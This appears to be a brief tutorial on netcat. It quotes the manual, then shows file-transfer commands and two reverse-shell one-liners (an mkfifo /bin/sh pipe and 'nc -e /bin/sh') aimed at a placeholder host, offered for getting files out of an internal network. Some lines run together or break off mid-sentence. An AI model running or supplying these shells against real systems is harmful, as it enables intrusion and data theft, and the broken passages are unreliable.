What is NetCat
- According to its manual:
Netcat is a simple Unix utility which reads and writes data across network connections, using TCP or UDP protocol. It is designed to be a reliable "back-end" tool that can be used directly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and exploration tool, since it can create almost any kind of connection you would need and has several interesting built-in capabilities. Netcat, or "nc" as the original program was named, should have been supplied long ago as another one of those cryptic but standard Unix tools.
From a hacker's perspective, NetCat is known as a very handy tool when it comes to implementing a system shell or testing connectivity.
Plus, NetCat can be used as a file transfer tool or a cross-machine clipboard
If you open a port
4444on one machine, say
192.168.1.123, and want to put file
nc -nlvp 4444
cat test.txt | nc -nv 192.168.1.123 4444
You can easily pull a file out of an internal network using this method, through a reverse shell
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <host> <port> >/tmp/fcan be used when the NetCat on target system doesn't support
nc -nv <host> <port> -e /bin/sh